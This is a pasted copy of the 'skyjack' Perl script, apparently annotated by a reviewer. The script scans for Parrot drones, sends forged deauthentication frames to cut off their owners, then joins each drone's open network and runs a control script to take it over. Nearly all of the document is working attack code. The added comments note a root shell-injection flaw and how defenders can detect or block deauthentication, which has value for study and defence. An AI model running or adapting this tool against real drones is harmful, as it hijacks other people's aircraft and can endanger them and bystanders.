FlyFar

skyjack.pl

Mar 14th, 2023
Perl 3.73 KB | Cybersecurity | 1 0
  1. #!/usr/bin/perl
  2.  
  3. # skyjack, by samy kamkar
  4.  
  5. # this software detects flying drones, deauthenticates the
  6. # owner of the targetted drone, then takes control of the drone
  7.  
  8. # by samy kamkar, code@samy.pl
  9. # http://samy.pl
  10. # dec 2, 2013
  11.  
  12.  
  13. # mac addresses of ANY type of drone we want to attack
  14. # Parrot owns the 90:03:B7 block of MACs and a few others
  15. # see here: http://standards.ieee.org/develop/regauth/oui/oui.txt
  16. my @drone_macs = qw/90:03:B7 00:12:1C 90:3A:E6 A0:14:3D 00:12:1C 00:26:7E/;
  17.  
  18.  
  19. use strict;
  20.  
  21. my $interface  = shift || "wlan1";
  22. my $interface2 = shift || "wlan0";
  23.  
  24. # the JS to control our drone
  25. my $controljs  = shift || "drone_control/drone_pwn.js";
  26.  
  27. # paths to applications
  28. my $dhclient    = "dhclient";
  29. my $iwconfig    = "iwconfig";
  30. my $ifconfig    = "ifconfig";
  31. my $airmon  = "airmon-ng";
  32. my $aireplay    = "aireplay-ng";
  33. my $aircrack    = "aircrack-ng";
  34. my $airodump    = "airodump-ng";
  35. my $nodejs  = "nodejs";
  36.  
  37.  
  38. # put device into monitor mode
  39. sudo($ifconfig, $interface, "down");
  40. #sudo($airmon, "start", $interface);
  41.  
  42. # tmpfile for ap output
  43. my $tmpfile = "/tmp/dronestrike";
  44. my %skyjacked;
  45.  
# Main loop. Each pass: capture nearby access points to CSV, parse the CSV
# for devices whose MAC starts with an entry of @drone_macs, send
# deauthentication frames to the clients associated with them, then join each
# not-yet-seen drone network and run the control script. There is no exit
# condition; the loop runs until the process is terminated.
#
# NOTE(review): nothing here checks that a matched device belongs to the
# operator; selection rests on a MAC prefix and an ESSID starting "ardrone".
# What a defender can read off this code: the join step supplies an ESSID and
# no key, so the whole path depends on the drone's network being open, and on
# the owner's client honouring forged deauthentication frames.
while (1)
{

        # show user APs
        # The capture runs inside eval so that Ctrl-C (SIGINT) only aborts this
        # block. $@ is never inspected afterwards, so a failed capture is silent.
        eval {
            local $SIG{INT} = sub { die };
            # NOTE(review): two-argument pipe open on a bareword handle; $airodump,
            # $tmpfile and $interface are interpolated into a string handed to the
            # shell, and the command runs under sudo. $interface comes straight
            # from the command line, so shell metacharacters in it would be
            # interpreted with root privileges.
            my $pid = open(DUMP, "|sudo $airodump --output-format csv -w $tmpfile $interface >>/dev/null 2>>/dev/null") || die "Can't run airodump ($airodump): $!";
            print "pid $pid\n";

            # let the capture run for 2 seconds, then stop it, escalating over
            # the following seconds (the original comment said "wait 5 seconds")
            sleep 2;
            # Writes a literal Ctrl-C byte to the pipe; this is not a signal.
            print DUMP "\cC";
            sleep 1;
            # NOTE(review): $pid is whatever child open() created; since the command
            # goes through the shell and sudo, it is presumably not airodump's own
            # pid -- confirm.
            sudo("kill", $pid);
            sleep 1;
            sudo("kill", "-HUP", $pid);
            sleep 1;
            sudo("kill", "-9", $pid);
            sleep 1;
            # Kills every aireplay-ng and airodump-ng process on the host, not only
            # the ones started by this script.
            sudo("killall", "-9", $aireplay, $airodump);
            #kill(9, $pid);
            close(DUMP);
        };

        sleep 4;
        # read in APs
        my %clients;    # client MAC => MAC of the matched device it is associated with
        my %chans;      # matched device MAC => [channel, ESSID]
        # NOTE(review): the glob picks up any file in /tmp with this prefix,
        # including ones not written by this run.
        foreach my $tmpfile1 (glob("$tmpfile*.csv"))
        {
                # NOTE(review): two-argument open; on failure this only prints a
                # message and the read loop below then runs on an unopened handle.
                open(APS, "<$tmpfile1") || print "Can't read tmp file $tmpfile1: $!";
                while (<APS>)
                {
                    # strip weird chars
                    # Only NUL and CR are removed; everything else in the captured
                    # line, including the ESSID, is used and printed as received.
                    s/[\0\r]//g;

                    foreach my $dev (@drone_macs)
                    {
                        # determine the channel
                        # Captures: $1 full MAC starting with the prefix, $2 channel
                        # number, $3 ESSID beginning "ardrone". Assumes the column
                        # layout of the capture CSV's access-point rows -- TODO confirm.
                        if (/^($dev:[\w:]+),\s+\S+\s+\S+\s+\S+\s+\S+\s+(\d+),.*(ardrone\S+),/)
                        {
                            print "CHANNEL $1 $2 $3\n";
                            $chans{$1} = [$2, $3];
                        }

                        # grab our drone MAC and owner MAC
                        # Captures: $1 the MAC at the start of the line (the client),
                        # $2 a later MAC starting with the prefix (the device it is
                        # associated with).
                        if (/^([\w:]+).*\s($dev:[\w:]+),/)
                        {
                            print "CLIENT $1 $2\n";
                            $clients{$1} = $2;
                        }
                    }
                }
                close(APS);
                sudo("rm", $tmpfile1);
                #unlink($tmpfile1);
        }
        print "\n\n";

        # NOTE(review): %clients is filled independently of %chans, so a client
        # can point at a MAC with no %chans entry. The lookups below then yield
        # undef and can autovivify an empty %chans entry, which the later
        # keys %chans loop would also visit.
        foreach my $cli (keys %clients)
        {
            print "Found client ($cli) connected to $chans{$clients{$cli}}[1] ($clients{$cli}, channel $chans{$clients{$cli}}[0])\n";


            # hop onto the channel of the ap
            print "Jumping onto drone's channel $chans{$clients{$cli}}[0]\n\n";
            #sudo($airmon, "start", $interface, $chans{$clients{$cli}}[0]);
            sudo($iwconfig, $interface, "channel", $chans{$clients{$cli}}[0]);

            sleep(1);

            # now, disconnect the TRUE owner of the drone.
            # sucker.
            # Sends deauthentication (-0) with a count of 3, addressed to this
            # one client/AP pair. On the defending side this appears as deauth
            # frames that neither the AP nor the client originated, which
            # wireless monitoring can alert on. Protected management frames
            # (802.11w) are designed to make stations reject such frames;
            # whether the matched devices support that is not shown here.
            print "Disconnecting the true owner of the drone ;)\n\n";
            sudo($aireplay, "-0", "3", "-a", $clients{$cli}, "-c", $cli, $interface);

        }

        sleep(2);

        # go into managed mode
        #sudo($airmon, "stop", $interface);

        # connect to each drone and run our zombie client!
        foreach my $drone (keys %chans)
        {
            # ignore drones we've skyjacked before -- thanks to @daviottenheimer for bug discovery!
            # Keyed by ESSID; the post-increment marks it as seen for later passes.
            next if $skyjacked{$chans{$drone}[1]}++;

            print "\n\nConnecting to drone $chans{$drone}[1] ($drone)\n";
            # Only an ESSID is set, no key: as written this joins an open network.
            # The ESSID is captured data, passed as a separate argument (no shell).
            sudo($iwconfig, $interface2, "essid", $chans{$drone}[1]);

            print "Acquiring IP from drone for hostile takeover\n";
            sudo($dhclient, "-v", $interface2);

            print "\n\nTAKING OVER DRONE\n";
            # Runs the control script under sudo; system() waits, so the loop
            # does not continue until that script exits.
            sudo($nodejs, $controljs);

        }

    sleep 5;
}
  148.  
  149.    
  150. sub sudo
  151. {
  152.     print "Running: @_\n";
  153.     system("sudo", @_);
  154. }